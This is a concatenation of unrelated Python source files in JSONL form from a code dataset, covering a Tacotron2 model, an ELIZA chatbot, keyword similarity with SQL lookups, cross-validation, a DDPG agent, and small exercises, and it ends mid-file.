out_channels=embedding_dim, kernel_size=5, padding=2)\n self.conv2 = ConvBlock(in_channels=embedding_dim, out_channels=embedding_dim, kernel_size=5, padding=2)\n self.conv3 = ConvBlock(in_channels=embedding_dim, out_channels=embedding_dim, kernel_size=5, padding=2)\n self.birnn = nn.LSTM(input_size=embedding_dim, hidden_size=int(hidden_size/2), bidirectional=True, dropout=0.1,batch_first=True) # TODO add soneout\n\n def forward(self, text):\n # input - (batch, maxseqlen) | (4, 156)\n x = self.char_embedding(text) # (batch, seqlen, embdim) | (4, 156, 512)\n #x = x.permute(0, 2, 1) # swap to batch, channel, seqlen (4, 512, 156)\n x= x.transpose(1,2) # swap to batch, channel, seqlen (4, 512, 156)\n x = self.conv1(x) # (4, 512, 156)\n x = self.conv2(x) # (4, 512, 156)\n x = self.conv3(x) # (4, 512, 156)\n #x = x.permute(2, 0, 1) # swap seq, batch, dim for rnn | (156, 4, 512)\n x = x.transpose(1,2) # swap seq, batch, dim for rnn | (156, 4, 512)\n x, _ = self.birnn(x) # (156, 4, 512) | 256 dims in either direction\n # sum bidirectional outputs\n #x = (x[:, :, :256] + x[:, :, 256:])\n return x\n\n\nclass Decoder(nn.Module):\n \"\"\"\n Decodes encoder output and previous predicted spectrogram frame into next spectrogram frame.\n \"\"\"\n\n def __init__(self, hidden_size=1024, num_layers=2,\n num_mels=80, num_prenet_features=256):\n super(Decoder, self).__init__()\n self.num_layers = num_layers\n self.hidden_size = hidden_size\n self.num_mels = num_mels\n\n self.prenet = PreNet(in_features=num_mels, out_features=num_prenet_features)\n #self.attention = LocationAttention(encoded_dim=256, query_dim=hidden_size, attention_dim=128)\n self.attention=Attention(hp.att_type,hp.enc_h_size)\n self.rnn = nn.LSTM(input_size=num_prenet_features + 256, hidden_size=hidden_size, num_layers=num_layers, dropout=0.1)\n self.spec_out = nn.Linear(in_features=hidden_size + 256, out_features=num_mels)\n self.stop_out = nn.Linear(in_features=hidden_size + 256, out_features=1)\n self.postnet = PostNet()\n\n def init_hidden(self, batch_size):\n return (nn.Parameter(torch.zeros(self.num_layers, batch_size, self.hidden_size)).cuda(),\n nn.Parameter(torch.zeros(self.num_layers, batch_size, self.hidden_size)).cuda())\n\n def init_mask(self, encoder_out):\n seq1_len, batch_size, _ = encoder_out.size()\n return Variable(encoder_out.data.new(1, batch_size, seq1_len).fill_(0))\n\n def forward(self, previous_out, encoder_out, decoder_hidden=None, mask=None):\n \"\"\"\n Decodes a single frame\n \"\"\"\n import pdb; pdb.set_trace()\n previous_out = self.prenet(previous_out) # (4, 1, 256)\n hidden, cell = decoder_hidden\n #context, mask = self.attention(hidden[:-1], encoder_out, mask)\n att_weights = self.attention(hidden,encoder_out)\n context=att_weights.bmm(encoder_out)#.squeeze(1)\n rnn_input = torch.cat([previous_out, context], dim=2)\n rnn_out, decoder_hidden = self.rnn(rnn_input, decoder_hidden)\n spec_frame = self.spec_out(torch.cat([rnn_out, context], dim=2)) # predict next audio frame\n stop_token = self.stop_out(torch.cat([rnn_out, context], dim=2)) # predict stop token\n spec_frame = spec_frame.permute(1, 0, 2)\n spec_frame = spec_frame + self.postnet(spec_frame) # add residual\n return spec_frame.permute(1, 0, 2), stop_token, decoder_hidden, mask\n\n\nclass Tacotron2(nn.Module):\n\n def __init__(self,in_size):\n super(Tacotron2, self).__init__()\n #self.encoder = Encoder(num_chars=in_size)\n self.embed=CustomEmbedding(in_size,hp.embed_size,hp.embed_drop)\n self.encoder=BaseEncoder(hp.embed_size,hp.enc_h_size,hp.enc_drop,hp.bidirectional,hp.rnn)\n #self.encoder = BaseEncoder(num_chars=in_size)\n\n self.decoder = Decoder()\n\n def forward(self, text,mel_targets):\n\n text=self.embed(text)\n encoder_output = self.encoder(text)\n frames, stop_tokens, masks = self.decode(encoder_output,mel_targets)\n return frames, stop_tokens, masks\n\n def get_path(self):\n return \"/taco_test/\"\n\n def decode(self, encoder_out,mel_targets,teacher_forcing_ratio=1.):\n import pdb; pdb.set_trace()\n batch_size,seq1_len, _ = encoder_out.size()\n maxlen=mel_targets.size(1)\n #outputs = Variable(encoder_out.data.new(maxlen, batch_size, hp.num_mels))\n #stop_tokens = Variable(outputs.data.new(maxlen, batch_size))\n #masks = torch.zeros(maxlen, batch_size, seq1_len)\n\n # start token spectrogram frame of zeros, starting mask of zeros\n #output = Variable(outputs.data.new(1, batch_size, hp.num_mels).fill_(0))\n output= torch.zeros((batch_size,1,hp.num_mels)).type(torch.cuda.FloatTensor)\n mask = self.decoder.init_mask(encoder_out) # get initial mask\n hidden = self.decoder.init_hidden(batch_size)\n for t in range(maxlen):\n output, stop_token, hidden, mask = self.decoder(output, encoder_out, hidden, mask)\n outputs[t] = output\n #import pdb; pdb.set_trace()\n stop_tokens[t] = stop_token.squeeze(0).squeeze(-1)\n masks[t] = mask.data\n # teacher forcing\n if random.random() < teacher_forcing_ratio:\n output = mel_targets[t].unsqueeze(0)\n return outputs, stop_tokens.transpose(1, 0), masks.permute(1, 2, 0) # batch, src, trg\n","sub_path":",/models/Tacotron2/Tacotron2_network.py","file_name":"Tacotron2_network.py","file_ext":"py","file_size_in_byte":8476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"490464768","text":"import random\nimport gym\nenv = gym.make('MountainCar-v0')\nenv.reset()\n# \nprint('開始進行遊戲')\nprint('終機端按ctrl-c則可結束遊戲')\nrandom_number = lambda:random.randint(0,2)\n\nwhile True:\n env.step(random_number())\n env.render()\n","sub_path":"unit1_test_gym.py","file_name":"unit1_test_gym.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25645977","text":"# -*- coding: utf-8 -*-\n__author__ = 'liudong'\n__date__ = '2019/10/18 8:25 PM'\nimport os\nimport time\n\"\"\"\n实现跑马灯的输出效果\n\"\"\"\ndef main():\n content = '北京欢迎你为你开天辟地。。。'\n while True:\n os.system('clear')\n print(content)\n time.sleep(0.2)\n content = content[1:] + content[0]\n\nif __name__ == '__main__':\n main()","sub_path":"Python/Python_Basic/practise_example/PaoMaDeng.py","file_name":"PaoMaDeng.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602680032","text":"# from nltk.chat import eliza, util\nimport nltk\n\nimport re\nimport random\n\npairs = nltk.chat.eliza.pairs\nreflections = nltk.chat.util.reflections\n\nclass elizaBot(nltk.chat.util.Chat):\n '''\n Inherit from `nltk.chat.eliza.eliza_chatbot` module and modify converse function\n '''\n def __init__(self, pairs, reflections={}):\n self._pairs = [(re.compile(x, re.IGNORECASE), y) for (x, y) in pairs]\n self._reflections = reflections\n self._regex = self._compile_reflections()\n # Add list of words that mark EOC\n self.escape = [\"bye\", \"good bye\", \"goodbye\"]\n\n def converse(self, user_input):\n \"\"\"Overrides the original converse model of the nltk.util.Chat class\n \"\"\"\n if user_input.lower() in self.escape:\n return user_input\n while user_input[-1] in \"!.\":\n user_input = user_input[:-1]\n response = self.respond(user_input)\n return response\n\nif __name__==\"__main__\":\n bot = elizaBot(pairs, reflections)\n while True:\n i = input(\"> \")\n resp = bot.converse(i)\n print(resp)\n\n","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"232563855","text":"# !/usr/bin/env/ python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nthis python file including basic functions frequently-used.\n\"\"\"\n\n__author__ = 'jay'\n\n\nimport jieba\nimport json\nfrom numpy import array, zeros\nfrom numpy.linalg import norm\nimport pandas.io.sql as sql\nfrom collections import defaultdict\n\nfrom source import stopwords\nfrom sql_api import mx_kol\nfrom profile_doc import Profile, Doc\nfrom classify_long_text.long_text_classify import long_text_classify\nfrom classify_long_text.liblinearutil import load_model\n\n\n############################################################################\n# model and tags_map for content tag calculation\nmodel_file = './classify_long_text/model_data/svm.model'\nmodel = load_model(model_file)\nlabels_map_file = './classify_long_text/model_data/labels_map.json'\ntags_dict = json.load(open(labels_map_file))\n# enable parallel word-cut mode\njieba.enable_parallel(2)\n############################################################################\n\n\ndef get_keywords(doc, set_weights=False, topk=30):\n \"\"\"\n get keyword vector or dictionary for given document.\n :param doc: str object.\n :param set_weights: default False, with each word having the same weight 1;\n set true if different weights are needed.\n :param topk: select top k words.\n :return: key words vector, list-like.\n \"\"\"\n # generally, there are a lot of spaces in the document, remove them.\n doc = ''.join(doc.split())\n if not isinstance(doc, unicode):\n doc = unicode(doc, 'utf8')\n words_list = jieba.cut(doc)\n # filter those words with length less than 2.\n words_list = [word for word in words_list if word not in stopwords and len(word) > 1]\n frequency = defaultdict(int)\n for word in words_list:\n frequency[word] += 1\n # sort word dict according to frequency.\n frequency = sorted(frequency.items(), key=lambda x: x[1], reverse=True)\n # get top k key words\n frequency = dict(frequency[0: topk+1])\n\n if set_weights:\n max_freq = max(frequency.values())\n frequency = {word: float(freq)/max_freq for word, freq in frequency.items()}\n return frequency\n else:\n return {word: 1 for word in frequency.keys()}\n\n\ndef keyword_similarity(keyword1, keyword2):\n \"\"\"\n calculate the similarity between two keyword vectors based on cosine distance.\n :param keyword1: keyword dict with word set as key, word weight as value.\n :param keyword2: same as above.\n :return: similarity value, float, between 0 and 1.\n \"\"\"\n keywords_set = list(set(keyword1.keys()).union(set(keyword2.keys())))\n vector1 = zeros(len(keywords_set))\n vector2 = zeros(len(keywords_set))\n for i in range(len(keywords_set)):\n word = keywords_set[i]\n vector1[i] = keyword1.get(word, 0)\n vector2[i] = keyword2.get(word, 0)\n\n return vector1.dot(vector2) / (norm(vector1) * norm(vector2))\n\n\ndef similarity(profile, doc, weight1=1, weight2=1, weight3=1):\n\n # industry_tag_weight = weight1\n # content_weight = weight2\n # content_features_weight = weight3\n\n pro_industry_tag, pro_content, pro_keywords = profile.get_triple_tuple()\n\n doc_industry_tag, doc_content_tags, doc_content_tag, doc_keywords = doc.get_triple_tuple()\n\n sim = 0.0\n sim += weight1 if pro_industry_tag == doc_industry_tag else 0\n sim += weight2 * sum([1 for word in doc_content_tags if word in pro_content.keys()])\n if doc_content_tag in pro_content.keys():\n sim += weight3 * keyword_similarity(pro_content[doc_content_tag], doc_keywords)\n else:\n sim += weight3 * keyword_similarity(pro_keywords, doc_keywords)\n\n return sim\n\n\ndef docs2pro_filtering(profile, docs, topk=10, threshold=10):\n\n result = [(doc.get_title(), similarity(profile, doc)) for doc in docs if similarity(profile, doc) < threshold]\n result.sort(key=lambda x: x[1], reverse=True)\n\n # return a top k list of open_id\n if len(docs) < topk:\n return [title for title, sim in result]\n return [result[i][0] for i in range(topk)]\n\n\ndef pros2doc_filtering(profiles, doc, topk=10, threshold=10):\n\n result = [(profile.get_user_id(), similarity(profile, doc)) for profile in profiles\\\n if similarity(profile, doc) < threshold]\n result.sort(key=lambda x: x[1], reverse=True)\n\n if len(profiles) < topk:\n return [user_id for user_id, sim in result]\n return [result[i][0] for i in range(topk)]\n\n\ndef get_profile(user_id):\n\n select_profile = u\"select * from mx_kol.user_profile where userid='%s'\" % user_id\n profile = sql.read_frame(select_profile, mx_kol)\n user_id = profile['userid'][0]\n industry_tag = profile['industry_tag'][0].decode('utf8')\n contents = profile['contents'][0]\n contents = json.loads(contents)\n keywords = profile['keywords'][0]\n keywords = json.loads(keywords)\n\n profile = Profile(user_id)\n profile.set_industry_tag(industry_tag)\n profile.set_content(contents)\n profile.set_keywords(keywords)\n\n return profile\n\n\ndef get_doc(url):\n\n select_user_text = u\"select userid, text, ext_data from mx_kol.weixin_kol_status where url='%s'\" % url\n # DataFrame object with columns('userid', 'text')\n df = sql.read_frame(select_user_text, mx_kol)\n user_id = df['userid'][0]\n doc = df['text'][0]\n # doc's keywords\n keywords = get_keywords(doc, True)\n ext_data = df['ext_data'][0]\n ext = json.loads(ext_data)\n # doc's content tag\n content_tag = ext.get('content_tags', None)\n if content_tag == None:\n content_tag = get_content_tag(doc)\n\n select_industry_tag = u\"select tag from mx_kol.mx_tag where id in (select tag_id from mx_kol.kol_tag_map \\\n where userid = '%s' and map_tag_type=%d and kol_type=%d)\" % (user_id, 1, 2) # 1 for industry tag, 2 for weixin\n select_content_tag = u\"select tag from mx_kol.mx_tag where id in (select tag_id from mx_kol.kol_tag_map \\\n where userid = '%s' and map_tag_type=%d and kol_type=%d)\" % (user_id, 2, 2) # 1 for industry tag, 2 for weixin\n df = sql.read_frame(select_industry_tag, mx_kol)\n industry_tag = unicode(df['tag'][0], 'utf8')\n\n df = sql.read_frame(select_content_tag, mx_kol)\n # user's content tags\n content_tags = [tag.decode('utf-8')for tag in df['tag'] if not isinstance(tag, unicode)]\n\n doc = Doc(user_id)\n doc.set_title(title)\n doc.set_industry_tag(industry_tag)\n doc.set_content(content_tags)\n doc.set_content_tag(content_tag)\n doc.set_keywords(keywords)\n\n return doc\n\n\ndef get_content_tag(doc):\n \"\"\"\n get content tag for given document\n :param doc: str object\n :return: document's content tag selected from totally 37 common tags, unicode object\n \"\"\"\n tag, res = long_text_classify(doc, model)\n return tags_dict[repr(tag).decode('utf8')]","sub_path":"basic_functions.py","file_name":"basic_functions.py","file_ext":"py","file_size_in_byte":6790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"90045209","text":"l = ['magical unicorns',19,'hello',98.98,'world']\r\n#l = [2,3,1,7,4,12]\r\nl = ['magical','unicorns']\r\nsumInt= 0\r\nallString = \"\"\r\nnum=len(l)\r\nfor i in l:\r\n result1=isinstance(i, int)\r\n if result1 == False:\r\n for j in l:\r\n result2=isinstance(j, str)\r\n if result2 == False:\r\n break\r\n if result2 == True:\r\n print (\"The array you entered is of string type\")\r\n for count in range(0,num):\r\n allString+=l[count]\r\n print (\"String:\",allString)\r\n\r\n elif result2 == False:\r\n print (\"The array you entered is of mixed type\")\r\n break\r\n\r\nif result1 == True:\r\n print (\"The array you entered is of integer type\")\r\n\r\n for count in range(0,num):\r\n sumInt+=l[count]\r\n print (sumInt)\r\n","sub_path":"listelementdatatype.py","file_name":"listelementdatatype.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578626857","text":"def func1(k,i):\n a=list(str(k))\n b=0\n for j in a:\n if int(j)<=i:\n b+=1\n\n return b\n\ndef func2(n):\n s=str(n)+'='\n dic={}\n while n>1:\n for i in range(2,n+1):\n if n%i==0:\n dic[i]=dic.get(i,0)+1\n n=n//i\n break\n a=sorted(dic.items(),key=lambda x:x[0])\n for i in a:\n s+=str(i[0])+\"^\"+str(i[1])+'*'\n\n return s[:-1]\n\n\ndef func3(lst,v):\n lst2=[]\n for i in lst:\n a=sum(int(j) for j in list(str(i)))\n if a<v:\n lst2.append(i)\n return sorted(lst2,reverse=True)\n\n\n\ndef func4(x):\n return len(set(list(str(x))))\n\ndef func5(lst):\n lst1=[]\n lst2=[]\n for i in lst:\n if i%2==0:\n lst2.append(i)\n else:\n lst1.append(i)\n newlst=sorted(lst1)+sorted(lst2,reverse=True)\n return newlst\n\ndef func6(s):\n import re\n import math\n lst=re.findall('(-?\\d+,-?\\d+)',s)\n lst2=[]\n for i in range(len(lst)):\n lst2.append(tuple(map(int,lst[i].split(','))))\n return sorted(lst2,key=lambda x:(math.sqrt(x[0]**2+x[1]**2),-x[1]))\n\ndef func7(s):\n lst=s.split()\n dic={}\n for i in lst:\n dic[i]=dic.get(i,0)+1\n b=sorted(dic.items(),key=lambda x:(x[1],x[0]),reverse=True)\n return [b[i][0] for i in range(len(b))][0:3]\n\n\nif __name__=='__main__':\n # print(func3([1234, 2345, 5678, 8907],15))\n # print(func4(23389))\n # print(func6('(-3,4)(4,-3)(-4,-3)(3,4)'))\n # print(func7('hello hello hi apple'))\n pass\n #ps","sub_path":"Submit/haxinyi.py","file_name":"haxinyi.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81672475","text":"import random\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import GroupKFold\nfrom collections import Counter, defaultdict\n\n\ndef Read_data():\n # Read iris dataset\n iris = load_iris()\n df = pd.DataFrame(iris.data, columns=iris.feature_names)\n df[\"target\"] = iris.target\n\n # Define ID\n list_id = [\"A\", \"B\", \"C\", \"D\", \"E\"]\n df[\"ID\"] = np.random.choice(list_id, len(df))\n\n # Extract feature names\n features = iris.feature_names\n\n return df, features\n\n\ndef Count_y(y, groups):\n # y counts per group\n unique_num = np.max(y) + 1\n y_counts_per_group = defaultdict(lambda: np.zeros(unique_num))\n for label, g in zip(y, groups):\n y_counts_per_group[g][label] += 1\n\n return y_counts_per_group\n\n\ndef StratifiedGroupKFold(X, y, groups, features, k, seed = None):\n # Preparation\n max_y = np.max(y)\n y_counts_per_group = Count_y(y, groups)\n kf = GroupKFold(n_splits=k)\n\n for train_idx, val_idx in kf.split(X, y, groups):\n # Training dataset and validation dataset\n x_train = X.iloc[train_idx, :]\n id_train = x_train[\"ID\"].unique()\n x_train = x_train[features]\n\n x_val, y_val = X.iloc[val_idx, :], y.iloc[val_idx]\n id_val = x_val[\"ID\"].unique()\n x_val = x_val[features]\n\n # y counts of training dataset and validation dataset\n y_counts_train = np.zeros(max_y+1)\n y_counts_val = np.zeros(max_y+1)\n for id_ in id_train:\n y_counts_train += y_counts_per_group[id_]\n for id_ in id_val:\n y_counts_val += y_counts_per_group[id_]\n\n # Determination ratio of validation dataset\n numratio_train = y_counts_train / np.max(y_counts_train)\n stratified_count = np.ceil(y_counts_val[np.argmax(y_counts_train)] * numratio_train)\n stratified_count = stratified_count.astype(int)\n\n # Select validation dataset randomly\n val_idx = np.array([])\n np.random.seed(seed) \n for num in range(max_y+1):\n val_idx = np.append(val_idx, np.random.choice(y_val[y_val==num].index, stratified_count[num]))\n val_idx = val_idx.astype(int)\n \n yield train_idx, val_idx\n\n\ndef Get_distribution(y_vals):\n # Get distribution\n y_distr = Counter(y_vals)\n y_vals_sum = sum(y_distr.values())\n\n return [f\"{y_distr[i] / y_vals_sum:.2%}\" for i in range(np.max(y_vals) + 1)]\n\n\nif __name__ == \"__main__\":\n \n df_iris, features = Read_data()\n\n print(df_iris.head())\n\n train_x = df_iris.drop(\"target\", axis=1)\n train_y = df_iris[\"target\"]\n groups = df_iris[\"ID\"]\n\n distrs = [Get_distribution(train_y)]\n index = [\"all dataset\"]\n\n \n for fold, (train_idx, val_idx) in enumerate(StratifiedGroupKFold(X, y, groups, features, k=3)):\n\n print(f\"TRAIN_ID - fold {fold}:\", groups[train_idx].unique(), \n f\"TEST_ID - fold {fold}:\", groups[val_idx].unique())\n \n distrs.append(Get_distribution(y[train_idx]))\n index.append(f\"training set - fold {fold}\")\n distrs.append(Get_distribution(y[val_idx]))\n index.append(f\"validation set - fold {fold}\")\n\n print(pd.DataFrame(distrs, index=index, columns=[f\"Label {l}\" for l in range(np.max(y) + 1)]))\n","sub_path":"MachineLearning/StratifiedGroupKFold.py","file_name":"StratifiedGroupKFold.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374307643","text":"# In a given grid, each cell can have one of three values:\r\n#\n#\n# \tthe value 0 representing an empty cell;\r\n# \tthe value 1 representing a fresh orange;\r\n# \tthe value 2 representing a rotten orange.\r\n#\n#\n# Every minute, any fresh orange that is adjacent (4-directionally) to a rotten orange becomes rotten.\r\n#\n# Return the minimum number of minutes that must elapse until no cell has a fresh orange.  If this is impossible, return -1 instead.\r\n#\n#  \r\n#\n#\n# Example 1:\r\n#\n#\n#\n#\n# Input: [[2,1,1],[1,1,0],[0,1,1]]\r\n# Output: 4\r\n#\n#\n#\n# Example 2:\r\n#\n#\n# Input: [[2,1,1],[0,1,1],[1,0,1]]\r\n# Output: -1\r\n# Explanation: The orange in the bottom left corner (row 2, column 0) is never rotten, because rotting only happens 4-directionally.\r\n#\n#\n#\n# Example 3:\r\n#\n#\n# Input: [[0,2]]\r\n# Output: 0\r\n# Explanation: Since there are already no fresh oranges at minute 0, the answer is just 0.\r\n#\n#\n#  \r\n#\n# Note:\r\n#\n#\n# \t1 <= grid.length <= 10\r\n# \t1 <= grid[0].length <= 10\r\n# \tgrid[i][j] is only 0, 1, or 2.\r\n#\n#\n#\n#\n#\n\n\nclass Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n m = len(grid)\n if m == 0:\n return -1\n n = len(grid[0])\n if n == 0:\n return -1\n fresh = set()\n q = []\n for i in range(m):\n for j in range(n):\n if grid[i][j] == 1:\n fresh.add((i, j))\n elif grid[i][j] == 2:\n q.append((i, j))\n t = 0\n d = [0, -1, 0, 1, 0]\n while len(fresh) != 0 and len(q) != 0:\n size = len(q)\n for i in range(size):\n x, y = q[i]\n for k in range(4):\n u, v = x + d[k], y + d[k + 1]\n if 0 <= u < m and 0 <= v < n and grid[u][v] == 1:\n grid[u][v] = 2\n q.append((u, v))\n fresh.remove((u, v))\n q = q[size:]\n t += 1\n return t if len(fresh) == 0 else -1\n \n","sub_path":"solutions/1036-rotting-oranges/rotting-oranges.py","file_name":"rotting-oranges.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"611432324","text":"import os\nfrom multiprocessing import Process,Pool\nimport time,random\n\n# def func(value):\n# print('child process %s running in port %d' % (value, os.getpid()))\n#\n#\n# if __name__ == '__main__':\n# print('parent port is %d '% (os.getpid()))\n# p = Process(target=func , args=('你好',))\n# p.start()\n# p.join()\n# print('child process end!!!')\n\n\ndef login_hu(name):\n print('task %d in %d port'% (name, os.getpid()))\n start = time.time()\n time.sleep(random.random()*3)\n end = time.time()\n print('task %d runing %s ' %(name, str(end-start)))\n\nif __name__ == '__main__':\n print('parent process is %d port'% (os.getpid()))\n p = Pool(4)\n for i in range(0,5):\n p.apply_async(login_hu, args=(i,))\n print('waiting subprocessing done!!!')\n p.close()\n p.join()\n print('all process done')\n\n\n\n\n\n","sub_path":"multiprocessing11.py","file_name":"multiprocessing11.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165164904","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nimport random\nfrom collections import deque\n\n\n\nclass MLP(nn.Module):\n \"\"\" MLP with dense connections \"\"\"\n def __init__(self, input_size, output_size, hidden_size, num_hidden_layers=3):\n super().__init__()\n self.num_hidden_layers = num_hidden_layers\n hidden_size_aug = hidden_size + input_size\n self.linear_in = nn.Linear(input_size, hidden_size)\n hidden_layers = []\n for i in range(self.num_hidden_layers):\n hidden_layers.append(nn.Linear(hidden_size_aug, hidden_size))\n self.hidden_layers = nn.ModuleList(hidden_layers)\n self.linear_out = nn.Linear(hidden_size, output_size)\n\n def forward(self, inp):\n x = F.relu(self.linear_in(inp))\n for i in range(self.num_hidden_layers):\n x = torch.cat([x, inp], dim=1)\n x = F.relu(self.hidden_layers[i](x))\n return self.linear_out(x)\n\n## Critic (value) network maps state, action pair to value\nclass Critic(nn.Module):\n \"\"\" Single Q-networks \"\"\"\n def __init__(self, obs_size, act_size, hidden_size):\n super().__init__()\n self.net = MLP(obs_size+act_size, 1, hidden_size)\n\n def forward(self, state, action):\n state_action = torch.cat([state, action], 1)\n return self.net(state_action)\n\n## Actor directly maps states to action\nclass Actor(nn.Module):\n def __init__(self, obs_size, act_size, hidden_size, max_action):\n super().__init__()\n self.net = MLP(obs_size, act_size, hidden_size)\n self.max_action = max_action\n\n def forward(self, state):\n x = self.net(state)\n action = torch.tanh(x) * self.max_action\n return action\n\n def act(self, state, device, noise=0):\n state = torch.FloatTensor(state).to(device).unsqueeze(0)\n action = self.forward(state)\n return action[0].detach().cpu().numpy()\n\n\nclass DDPG:\n def __init__(self,device,obs_size,act_size,max_action=1,hidden_size=256,gamma=0.99,tau=0.005,policy_noise=0.2,\n \t\t\t\t\t\t\t\t\tnoise_clip=0.5,policy_freq=1,exploration_noise=0.1):\n self.device = device \n self.act_size = act_size\n self.max_action = max_action\n self.gamma = gamma\n self.tau = tau\n self.policy_noise = policy_noise\n self.noise_clip = noise_clip\n self.policy_freq = policy_freq\n self.exploration_noise = exploration_noise\n self._timestep = 0\n\t\n\n\t## Randomly initialize critic network\n self.critic = Critic(obs_size, act_size, hidden_size).to(device)\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=3e-4) ## using adam optimization\n \n ## Randomly initialize actor network\n self.actor = Actor(obs_size, act_size, hidden_size, max_action).to(device)\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=3e-4) ## using adam optimization\n \n\t#### The target networks are time-delayed copies of their original networks that slowly track the learned networks. Using these target value networks greatly improve stability in learning. Here’s why: In methods that do not use target networks, the update equations of the network are interdependent on the values calculated by the network itself, which makes it prone to divergence. ####\n\t\n ## Randomly initialize critic target network\n self.critic_target = Critic(obs_size, act_size, hidden_size).to(device)\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_(param.data)\n \n ## Randomly initialize actor target\n self.actor_target = Actor(obs_size, act_size, hidden_size, max_action).to(device)\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_(param.data)\n \n ## Randomly initialize replay buffer\n self.replay_buffer = deque(maxlen=1000000)\n\n def act(self, state, train=True):\n action = self.actor.act(state, self.device)\n if train:\n ## Select action with exploration noise.\n action = (\n action + np.random.normal(0, self.exploration_noise, size=self.act_size)\n ).clip(-self.max_action, self.max_action)\n return action\n\n def update_parameters(self, batch_size=256):\n if len(self.replay_buffer) < batch_size:\n return\n\t## Select a batch of random sample from replay buffer\n batch = random.sample(self.replay_buffer, k=batch_size)\n state, action, reward, next_state, not_done = [torch.FloatTensor(t).to(self.device) for t in zip(*batch)]\n\n # Update critic\n with torch.no_grad():\n ## For continuous action spaces, exploration is done via adding noise to the action itself.\n noise = (torch.randn_like(action)*self.policy_noise).clamp(-self.noise_clip, self.noise_clip)\n \n ## original q value calculated using value network, not the target value network.\n q_original = self.critic(state, action)\n next_action = (self.actor_target(next_state) + noise).clamp(-self.max_action, self.max_action)\n q_next = self.critic_target(next_state, next_action)\n \n ## updated q value is calculated using target q network.\n ## The value network is updated similarly as is done in Q-learning. The updated Q value is obtained by the Bellman equation\n q_target = reward + not_done * self.gamma * q_next\n\n\n\t## We minimize the mean-squared loss between the updated Q value and the original Q value.\n critic_loss = F.mse_loss(q_original, q_target)\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n\t## For the policy function, our objective is to maximize the expected return\n ## To calculate the policy loss, we take the derivative of the objective function with respect to the policy parameters. Take the mean of the sum of gradients calculated from the mini-batch.\n actor_loss = -self.critic(state, self.actor(state)).mean()\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\t \n\t## Update target critic(value) network\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_((1.0-self.tau)*target_param.data + self.tau*param.data)\n\t \n\t## Update target actor(policy) network\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_((1.0-self.tau)*target_param.data + self.tau*param.data)\n \n def save(self, directory, name):\n torch.save(self.actor.state_dict(), '%s/%s_actor.pth' % (directory, name))\n torch.save(self.actor_target.state_dict(), '%s/%s_actor_target.pth' % (directory, name))\n \n torch.save(self.critic.state_dict(), '%s/%s_crtic_1.pth' % (directory, name))\n torch.save(self.critic_target.state_dict(), '%s/%s_critic_1_target.pth' % (directory, name))\n \n def load(self, directory, name):\n self.actor.load_state_dict(torch.load('%s/%s_actor.pth' % (directory, name), map_location=lambda storage, loc: storage))\n self.actor_target.load_state_dict(torch.load('%s/%s_actor_target.pth' % (directory, name), map_location=lambda storage, loc: storage))\n \n self.critic.load_state_dict(torch.load('%s/%s_crtic_1.pth' % (directory, name), map_location=lambda storage, loc: storage))\n self.critic_target.load_state_dict(torch.load('%s/%s_critic_1_target.pth' % (directory, name), map_location=lambda storage, loc: storage))\n \n def load_actor(self, directory, name):\n self.actor.load_state_dict(torch.load('%s/%s_actor.pth' % (directory, name), map_location=lambda storage, loc: storage))\n self.actor_target.load_state_dict(torch.load('%s/%s_actor_target.pth' % (directory, name), map_location=lambda storage, loc: storage))\n","sub_path":"ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"624646976","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pyopencl as cl\nfrom Models.weights import GaussianDispersion\nfrom sasmodel import set_precision\n\n\nclass GpuLamellar(object):\n PARS = {\n 'scale':1, 'bi_thick':1, 'sld_bi':1e-6, 'sld_sol':0, 'background':0,\n }\n PD_PARS = {'bi_thick'}\n def __init__(self, qx, qy, dtype='float32'):\n\n #create context, queue, and build program\n self.ctx = cl.create_some_context()\n self.queue = cl.CommandQueue(self.ctx)\n src,qx,qy = set_precision(open('Kernel/Kernel-Lamellar.cpp').read(), qx, qy, dtype=dtype)\n self.prg = cl.Program(self.ctx, src).build()\n self.qx, self.qy = qx, qy\n\n #buffers\n mf = cl.mem_flags\n self.qx_b = cl.Buffer(self.ctx, mf.READ_ONLY | 